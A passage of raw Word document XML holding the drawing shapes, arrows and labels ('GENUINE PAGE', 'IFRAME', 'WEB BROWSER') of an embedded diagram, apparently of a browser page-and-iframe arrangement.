                <v:shape id="Shape 1521" o:spid="_x0000_s1107" style="position:absolute;left:9034;top:4292;width:12291;height:3295;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1229146,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yexAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/bagIx&#10;EH0v+A9hCn0RzSpYZDWKCkKpUPCC4tuwGXdTN5MlSXX9+6ZQ8G0O5zrTeWtrcSMfjGMFg34Ggrhw&#10;2nCp4LBf98YgQkTWWDsmBQ8KMJ91XqaYa3fnLd12sRQphEOOCqoYm1zKUFRkMfRdQ5y4i/MWY4K+&#10;lNrjPYXbWg6z7F1aNJwaKmxoVVFx3f1YBd9ds1iW28/99fjVtadofHsebZR6e20XExCR2vgU/7s/&#10;dJo/Gg7g75t0gpz9AgAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAB1wLJ7EAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,329496r1229146,l1229146,,,,,329496xe" filled="f" strokecolor="#c8c8c8" strokeweight=".08072mm">
                  <v:stroke miterlimit="83231f" joinstyle="miter" endcap="square"/>
                  <v:path arrowok="t" textboxrect="0,0,1229146,329496"/>
                </v:shape>
                <v:rect id="Rectangle 1524" o:spid="_x0000_s1108" style="position:absolute;left:12011;top:5511;width:8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0F199B7F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="FEFFFF"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>GENUINE PAGE</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 49612" o:spid="_x0000_s1109" style="position:absolute;left:11317;top:13006;width:7186;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amxwAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heQUvUjeKtW10FRELHnrRlnp9ZJ9JaN7bkF1j6q93BaHHYWa+YRarjivVUuNLJwbGowQU&#10;SeZsKbmB76+P5zdQPqBYrJyQgT/ysFr2ewtMrbvIntpDyFWEiE/RQBFCnWrts4IY/cjVJNE7uYYx&#10;RNnk2jZ4iXCu9CRJZpqxlLhQYE2bgrLfw5kNnPk4fBE+rn9eW3bbLHf7z+vOmMFTt56DCtSF//Cj&#10;vbMGpu+z8QTud+IV0MsbAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJmk5qbHAAAA3gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" path="m,l718577,r,329496l,329496,,e" fillcolor="#feffff" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter" endcap="square"/>
                  <v:path arrowok="t" textboxrect="0,0,718577,329496"/>
                </v:shape>
                <v:shape id="Shape 1526" o:spid="_x0000_s1110" style="position:absolute;left:11317;top:13006;width:7186;height:3295;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="718577,32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w3wQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Li8Iw&#10;EL4v+B/CCN7WVJcVqUYRF0XEi1Y8D830gc2kJFHrvzcLgrf5+J4zX3amEXdyvrasYDRMQBDnVtdc&#10;Kjhnm+8pCB+QNTaWScGTPCwXva85pto++Ej3UyhFDGGfooIqhDaV0ucVGfRD2xJHrrDOYIjQlVI7&#10;fMRw08hxkkykwZpjQ4UtrSvKr6ebUXDIftxfsS8PF/LH4vbMtm5z3So16HerGYhAXfiI3+6djvN/&#10;xxP4/yaeIBcvAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAKlV7DfBAAAA3QAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m,329496r718577,l718577,,,,,329496xe" filled="f" strokecolor="#c8c8c8" strokeweight=".08072mm">
                  <v:stroke miterlimit="83231f" joinstyle="miter" endcap="square"/>
                  <v:path arrowok="t" textboxrect="0,0,718577,329496"/>
                </v:shape>
                <v:shape id="Shape 49613" o:spid="_x0000_s1111" style="position:absolute;left:12844;top:13830;width:4132;height:1648;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="413176,16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WNxgAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NbsIw&#10;EITvlXgHa5F6Kw6FBggYVIoq9Yb4vy7xkgTidRS7EN6+roTEcTQz32gms8aU4kq1Kywr6HYiEMSp&#10;1QVnCrab77chCOeRNZaWScGdHMymrZcJJtreeEXXtc9EgLBLUEHufZVI6dKcDLqOrYiDd7K1QR9k&#10;nUld4y3ATSnfoyiWBgsOCzlW9JVTeln/GgXzAW/ij+GhXOwK7GX7Y3NfnudKvbabzzEIT41/hh/t&#10;H62gP4q7Pfi/E66AnP4BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAsKxVjcYAAADeAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m,l413176,r,164748l,164748,,e" fillcolor="#4672c4" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter" endcap="square"/>
                  <v:path arrowok="t" textboxrect="0,0,413176,164748"/>
                </v:shape>
                <v:rect id="Rectangle 1532" o:spid="_x0000_s1112" style="position:absolute;left:13291;top:14243;width:428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129DDEB8" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="FEFFFF"/>
                            <w:sz w:val="15"/>
                            <w:bdr w:val="single" w:sz="4" w:space="0" w:color="C8C8C8"/>
                          </w:rPr>
                          <w:t>IFRAME</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1533" o:spid="_x0000_s1113" style="position:absolute;left:6467;top:22120;width:17426;height:0;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="174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j3xQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0X/A9hBC+lZqso7dYoIhaKxYPag8dhM91EN5PtJrprf31TKPQ2j/c5s0XnKnGlJljPCh6HGQji&#10;wmvLpYKPw+vDE4gQkTVWnknBjQIs5r27Gebat7yj6z6WIoVwyFGBibHOpQyFIYdh6GvixH36xmFM&#10;sCmlbrBN4a6SoyybSoeWU4PBmlaGivP+4hQcn+3EmlZ/nVeb+/f1cXv4rvGk1KDfLV9AROriv/jP&#10;/abT/Ml4DL/fpBPk/AcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQALfbj3xQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,l1742593,e" filled="f" strokeweight=".0775mm">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,1742593,0"/>
                </v:shape>
                <v:shape id="Shape 1534" o:spid="_x0000_s1114" style="position:absolute;left:6467;top:2350;width:17426;height:0;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="174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CDxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NTwIx&#10;EL2T8B+aIfFipIuK0ZVCDMGESDwIHjhOtuO2sJ2u28Iu/HpqYsJtXt7nTGadq8SRmmA9KxgNMxDE&#10;hdeWSwXfm/e7ZxAhImusPJOCEwWYTfu9Cebat/xFx3UsRQrhkKMCE2OdSxkKQw7D0NfEifvxjcOY&#10;YFNK3WCbwl0l77PsSTq0nBoM1jQ3VOzXB6dg+2LH1rT6dz//uF0ttp+bc407pW4G3dsriEhdvIr/&#10;3Uud5o8fHuHvm3SCnF4AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAhJQgg8YAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m,l1742593,e" filled="f" strokeweight=".0775mm">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,1742593,0"/>
                </v:shape>
                <v:shape id="Shape 1536" o:spid="_x0000_s1115" style="position:absolute;left:6467;top:2350;width:0;height:19770;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="0,197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bVwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/bagIx&#10;EH0v9B/CFPpWs7YqZWsUKZQuIoiXvk83003oZrIk6br9eyMIvs3hXGe+HFwregrRelYwHhUgiGuv&#10;LTcKjoePp1cQMSFrbD2Tgn+KsFzc382x1P7EO+r3qRE5hGOJCkxKXSllrA05jCPfEWfuxweHKcPQ&#10;SB3wlMNdK5+LYiYdWs4NBjt6N1T/7v+cgvWx+rY7e5hUprer8LWRw/hzq9Tjw7B6A5FoSDfx1V3p&#10;PH/6MoPLN/kEuTgDAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAZCJ21cMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,l,1976968e" filled="f" strokeweight=".0775mm">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,0,1976968"/>
                </v:shape>
                <v:shape id="Shape 1537" o:spid="_x0000_s1116" style="position:absolute;left:23893;top:2350;width:0;height:19770;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="0,197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tNOwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/bSgMx&#10;EH0X/Icwgm9ttlZbWZuWIhQXEUovvo+bcRPcTJYkbrd/3wgF3+ZwrrNYDa4VPYVoPSuYjAsQxLXX&#10;lhsFx8Nm9AwiJmSNrWdScKYIq+XtzQJL7U+8o36fGpFDOJaowKTUlVLG2pDDOPYdcea+fXCYMgyN&#10;1AFPOdy18qEoZtKh5dxgsKNXQ/XP/tcpeD9WX3ZnD4+V6e06fH7IYfK2Ver+bli/gEg0pH/x1V3p&#10;PP9pOoe/b/IJcnkBAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAC27TTsMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,l,1976968e" filled="f" strokeweight=".0775mm">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,0,1976968"/>
                </v:shape>
                <v:rect id="Rectangle 1539" o:spid="_x0000_s1117" style="position:absolute;left:11384;top:3237;width:8492;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41CC6262" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="4672C4"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>WEB BROWSER</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1540" o:spid="_x0000_s1118" style="position:absolute;left:14910;top:9711;width:24015;height:2580;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2401509,25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SxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bb8Iw&#10;DIXvSPyHyJO4QTq2IlQICNAQbLcBB45WY9qKxqmaAOXfzwek3Wy95/c+z5edq9Wd2lB5NvA+SkAR&#10;595WXBg4HbfDKagQkS3WnsnAkwIsF/3eHDPrH/xL90MslIRwyNBAGWOTaR3ykhyGkW+IRbv41mGU&#10;tS20bfEh4a7W4ySZaIcVS0OJDW1Kyq+HmzNw26zz6plu9df6NP457z7SesLfxgzeutUMVKQu/ptf&#10;13sr+Omn8Ms3MoJe/AEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCY+mRSxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m2401509,247128l2401509,,,,,257939e" filled="f" strokecolor="#00fefe" strokeweight=".32289mm">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,2401509,257939"/>
                </v:shape>
                <v:shape id="Shape 1541" o:spid="_x0000_s1119" style="position:absolute;left:14464;top:12189;width:892;height:818;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="89231,8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lQewwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4L/odlhF5EN5YqkrqKCNKeCj5aehyyYxLMzi7ZMab/visUepuP7zmrTe8a1VEba88GZtMMFHHh&#10;bc2lgfNpP1mCioJssfFMBn4owmY9HKwwt/7OB+qOUqoUwjFHA5VIyLWORUUO49QH4sRdfOtQEmxL&#10;bVu8p3DX6OcsW2iHNaeGCgPtKiqux5szkJ1D89WHsft4O8n3p9C2G99KY55G/fYVlFAv/+I/97tN&#10;8+cvM3h8k07Q618AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAaM5UHsMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,l89231,,44615,81834,,xe" fillcolor="#00fefe" stroked="f" strokeweight="0">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,89231,81834"/>
                </v:shape>
                <v:shape id="Shape 1542" o:spid="_x0000_s1120" style="position:absolute;left:14910;top:15478;width:24015;height:2471;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2401509,24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NxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCL2UujHYVqKrVEVpjyY9eByzYxKbnQ27W43/3i0UepvH+5z5sjetuJDzjWUF41ECgri0&#10;uuFKwVexfZ6C8AFZY2uZFNzIw3IxeJhjpu2V93TJQyViCPsMFdQhdJmUvqzJoB/ZjjhyJ+sMhghd&#10;JbXDaww3rUyT5FUabDg21NjRuqbyO/8xCorNmz4f6Fjs8oM77lfePK0/U6Ueh/37DESgPvyL/9wf&#10;Os5/maTw+008QS7uAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhACP4IE3EAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,l,247129r2401509,l2401509,71605e" filled="f" strokecolor="#00fefe" strokeweight=".32289mm">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,2401509,247129"/>
                </v:shape>
                <v:shape id="Shape 1543" o:spid="_x0000_s1121" style="position:absolute;left:38479;top:15478;width:892;height:818;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="89231,8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G/ywwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9La8JA&#10;EL4X/A/LCL1I3djWItFVRCj1VKgvPA7ZaRKanV2yY4z/vlsoeJuP7zmLVe8a1VEba88GJuMMFHHh&#10;bc2lgcP+/WkGKgqyxcYzGbhRhNVy8LDA3Porf1G3k1KlEI45GqhEQq51LCpyGMc+ECfu27cOJcG2&#10;1LbFawp3jX7OsjftsObUUGGgTUXFz+7iDGSH0Jz6MHKfH3s5H4XW3ehSGvM47NdzUEK93MX/7q1N&#10;86evL/D3TTpBL38BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA91Bv8sMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m44616,l89231,81834,,81834,44616,xe" fillcolor="#00fefe" stroked="f" strokeweight="0">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,89231,81834"/>
                </v:shape>
                <v:shape id="Shape 1544" o:spid="_x0000_s1122" style="position:absolute;left:14910;top:15478;width:32336;height:5809;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3233615,58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Q6wgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4X/A9hBG81u8UWWY0iQsGDYH2g12EzbhY3kyWJ7tpf3xQKvc3H95z5sreNeJAPtWMF+TgDQVw6&#10;XXOl4HT8fJ2CCBFZY+OYFDwpwHIxeJljoV3He3ocYiVSCIcCFZgY20LKUBqyGMauJU7c1XmLMUFf&#10;Se2xS+G2kW9Z9iEt1pwaDLa0NlTeDnerwF/6vGNp7I5Yf9/z7fbrvJ8qNRr2qxmISH38F/+5NzrN&#10;f59M4PebdIJc/AAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQALGtQ6wgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m3233615,r,580961l,580961,,505161e" filled="f" strokecolor="red" strokeweight=".32289mm">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,3233615,580961"/>
                </v:shape>
                <v:shape id="Shape 1545" o:spid="_x0000_s1123" style="position:absolute;left:14464;top:19813;width:892;height:818;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="89231,8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rOwgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4L/Q9hhN5q1tIVWY0ipa+LBV94HZNxd3EzWZLobv99Uyh4m4/vOfNlbxtxIx9qxwrGowwEsXam&#10;5lLBfvf+NAURIrLBxjEp+KEAy8XDYI6FcR1v6LaNpUghHApUUMXYFlIGXZHFMHItceLOzluMCfpS&#10;Go9dCreNfM6yibRYc2qosKXXivRle7UKdF7qkyf8mFyle/s+duvD4XOt1OOwX81AROrjXfzv/jJp&#10;fv6Sw9836QS5+AUAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQB2DirOwgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m44615,l89231,81834,,81834,44615,xe" fillcolor="red" stroked="f" strokeweight="0">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,89231,81834"/>
                </v:shape>
                <v:shape id="Shape 1546" o:spid="_x0000_s1124" style="position:absolute;left:14910;top:7760;width:32336;height:4423;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3233615,44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t3xAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/Q/LFLzpJqWGNrpKiRWknkx66HHMTpPQ7GzIrib5991Cwds83udsdqNpxY1611hWEC8jEMSl&#10;1Q1XCj6Lw+IFhPPIGlvLpGAiB7vtw2yDqbYDn+mW+0qEEHYpKqi971IpXVmTQbe0HXHgvm1v0AfY&#10;V1L3OIRw08qnKEqkwYZDQ40dZTWVP/nVKPgqzBRf+Di1p2afJYePYXx/rZSaP45vaxCeRn8X/7uP&#10;OsxfPSfw9004QW5/AQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhACaoy3fEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m3233615,442297l3233615,,,,,101827e" filled="f" strokecolor="red" strokeweight=".32289mm">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,3233615,442297"/>
                </v:shape>
                <v:shape id="Shape 1547" o:spid="_x0000_s1125" style="position:absolute;left:14464;top:8676;width:892;height:818;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="89231,8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EiwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0L/Q9hCr1ptlK1bI1SRFsvClrF6zSZ7i7dTJYkuuu/bwqCt3m8z5nOO1uLC/lQOVbwPMhAEGtn&#10;Ki4UHL5W/VcQISIbrB2TgisFmM8eelPMjWt5R5d9LEQK4ZCjgjLGJpcy6JIshoFriBP347zFmKAv&#10;pPHYpnBby2GWjaXFilNDiQ0tStK/+7NVoEeF/vaEH+OzdMvtqd0cj58bpZ4eu/c3EJG6eBff3GuT&#10;5o9eJvD/TTpBzv4AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA6ZARIsMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,l89231,,44615,81834,,xe" fillcolor="red" stroked="f" strokeweight="0">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,89231,81834"/>
                </v:shape>
                <v:shape id="Shape 1548" o:spid="_x0000_s1126" style="position:absolute;top:2471;width:4131;height:19770;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="413176,1977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JTxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8Mw&#10;DIXvg/0Ho8Fuq9PRjJHVLW0hrIcxWNofoMZqHBrLwfba7N9Ph8FuEu/pvU/L9eQHdaWY+sAG5rMC&#10;FHEbbM+dgeOhfnoFlTKyxSEwGfihBOvV/d0SKxtu/EXXJndKQjhVaMDlPFZap9aRxzQLI7Fo5xA9&#10;Zlljp23Em4T7QT8XxYv22LM0OBxp56i9NN/ewOIzlnr7Qcfa1fZkm/3pveRozOPDtHkDlWnK/+a/&#10;670V/HIhuPKNjKBXvwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDDBQJTxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,l413176,r,1977027l,1977027,,xe" fillcolor="#4672c4" stroked="f" strokeweight="0">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,413176,1977027"/>
                </v:shape>
                <v:shape id="Shape 1549" o:spid="_x0000_s1127" style="position:absolute;top:2471;width:4131;height:19770;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="413176,1977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hEwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCN50Y61io6sU0SJeWtNCr0N2TKLZ2ZBdk/jvXUHobR7vc5brzpSiodoVlhWMRxEI4tTq&#10;gjMFvz+74RyE88gaS8uk4EYO1qveyxJjbVs+UpP4TIQQdjEqyL2vYildmpNBN7IVceBOtjboA6wz&#10;qWtsQ7gp5WsUzaTBgkNDjhVtckovydUoOB+7yUF+/W2/k1Pbms+bM80+VWrQ7z4WIDx1/l/8dO91&#10;mD99e4fHN+EEuboDAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAXqhYRMMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,1977027r413176,l413176,,,,,1977027xe" filled="f" strokecolor="#c8c8c8" strokeweight=".08072mm">
                  <v:stroke miterlimit="1" joinstyle="miter" endcap="square"/>
                  <v:path arrowok="t" textboxrect="0,0,413176,1977027"/>
                </v:shape>
